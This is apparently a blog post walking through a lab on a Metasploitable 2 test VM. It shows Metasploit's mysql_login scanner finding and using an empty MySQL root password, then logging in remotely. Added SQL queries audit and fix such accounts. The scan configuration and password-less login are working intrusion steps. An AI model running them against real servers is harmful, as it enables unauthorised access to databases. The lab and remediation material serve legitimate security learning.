Scanning the Metasploitable 2 target's MySQL service for an empty password from Kali (akong3916's blog, 爱代码爱编程)
Lab environment
Linux kali 5.18.0-kali5-amd64
- Kali, well, anyone who got this far already knows it.
Linux metasploitable 2.6.24-16-server
- Metasploitable is a target VM for evaluating Metasploit: an Ubuntu Linux virtual machine used for testing common vulnerabilities.
Lab steps
1. Start the Kali database
In Kali, Metasploit uses PostgreSQL as its database by default.
- Start it in one of the following ways
Start the database
Method 1:
┌──(root㉿kali)-[~]
└─# systemctl start postgresql
Method 2:
┌──(root㉿kali)-[~]
└─# /etc/init.d/postgresql start
Method 3:
┌──(root㉿kali)-[~]
└─# service postgresql start
Check the database status
┌──(root㉿kali)-[~]
└─# systemctl status postgresql
Enable the database at boot
┌──(root㉿kali)-[~]
└─# systemctl enable postgresql
2. Initialize the MSF database
- If it has not been initialized, creds will report an error
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.xxx.xxx:3306 - 192.168.xxx.xxx:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.xxx.xxx:3306 - No active DB -- Credential data will not be saved!
[+] 192.168.xxx.xxx:3306 - 192.168.xxx.xxx:3306 - Success: 'root:'
[*] 192.168.xxx.xxx:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
No active DB, so credentials will not be saved. Viewing host and credential information then shows that the database is not connected:
[!] 192.168.xxx.xxx:3306 - No active DB -- Credential data will not be saved!
Running creds or hosts reports the error "Database not connected"
msf6 auxiliary(scanner/mysql/mysql_login) > creds
[-] Database not connected
msf6 auxiliary(scanner/mysql/mysql_login) > hosts
[-] Database not connected
[-] Database not connected
(1) Initialization
- Enter msf
┌──(root㉿kali)-[~]
└─# msfconsole
msf6 auxiliary(scanner/mysql/mysql_login) > db_status
The result is as follows:
[*] postgresql selected, no connection
msf6 auxiliary(scanner/mysql/mysql_login) > msfdb init
The result is as follows:
[*] exec: msfdb init
[i] Database already started
[+] Creating database user ‘msf’
为新角色输入的口令:
再输入一遍:
[+] Creating databases ‘msf’
[+] Creating databases ‘msf_test’
[+] Creating configuration file ‘/usr/share/metasploit-framework/config/database.yml’
[+] Creating initial database schema
- If it has already been initialized, run
msfdb reinit
You can see the generated configuration file
/usr/share/metasploit-framework/config/database.yml
You can open another window and enter the database
┌──(root㉿kali)-[~]
└─# sudo -u postgres psql
psql (14.4 (Debian 14.4-1+b1))
输入 "help" 来获取帮助信息.
postgres=# \du
角色列表
角色名称 | 属性 | 成员属于
----------+--------------------------------------------+----------
msf | | {}
postgres | 超级用户, 建立角色, 建立 DB, 复制, 绕过RLS | {}
postgres=# \l
数据库列表
名称 | 拥有者 | 字元编码 | 校对规则 | Ctype | 存取权限
-----------+----------+----------+-------------+-------------+-----------------------
msf | msf | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 |
msf_test | msf | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 |
postgres | postgres | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 |
template0 | postgres | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(5 行记录)
- Go back to msf and check the connection status; if it still shows no connection, exit msf and start it again
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
Initialization complete!
(2) Enter msf on Kali and scan with the module
- Search for the mysql_login module
msf6 > search mysql_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) >
- Configure the scan
set rhosts <target host IP>
set username root #the user we want to brute-force
set blank_passwords true #try a blank password for all users
show options #view the configuration
- Run
run
or exploit
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.149.130:3306 - 192.168.149.130:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.149.130:3306 - 192.168.149.130:3306 - Success: 'root:'
[*] 192.168.149.130:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Scan complete
- Use the database client command without giving a password; press Enter at the password prompt to log in
msf6 auxiliary(scanner/mysql/mysql_login) > mysql -h 192.168.149.130 -p
[*] exec: mysql -h 192.168.149.130 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 21
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>show databases;
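The scan above shows root logging in with an empty password over the network. As an added example (not part of the original post), these are the audit queries and fixes a defender would run on a MySQL 5.0-era server such as Metasploitable 2; on this version the mysql.user column is Password (on MySQL 5.7.6+ it is authentication_string), and the new password is a placeholder.

```sql
-- Added example: audit mysql.user for the weaknesses the scan found.
-- MySQL 5.0 schema (Metasploitable 2): the column is `Password`;
-- on MySQL 5.7.6+ use `authentication_string` instead.

-- 1. Accounts with no password at all (what blank_passwords=true finds)
SELECT User, Host
FROM mysql.user
WHERE Password = '' OR Password IS NULL;

-- 2. Privileged accounts reachable from any remote host
--    (the remote root login above is one of these)
SELECT User, Host
FROM mysql.user
WHERE Super_priv = 'Y' AND Host NOT IN ('localhost', '127.0.0.1');

-- 3. Anonymous accounts (User = ''), which also accept blank logins
SELECT User, Host FROM mysql.user WHERE User = '';

-- Remediation (placeholder password; set a real one per account):
-- give every named empty-password account a password
UPDATE mysql.user
SET Password = PASSWORD('REPLACE_WITH_STRONG_PASSWORD')
WHERE Password = '' AND User <> '';

-- remove anonymous accounts and remote root access
DELETE FROM mysql.user WHERE User = '';
DELETE FROM mysql.user
WHERE User = 'root' AND Host NOT IN ('localhost', '127.0.0.1');

FLUSH PRIVILEGES;

-- Re-check: this should now return no rows
SELECT User, Host FROM mysql.user WHERE Password = '' OR User = '';
```

If no remote clients need the database, also set bind-address to 127.0.0.1 in my.cnf so port 3306 is not reachable from the network at all.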
Summary
Hahaha, off to bed.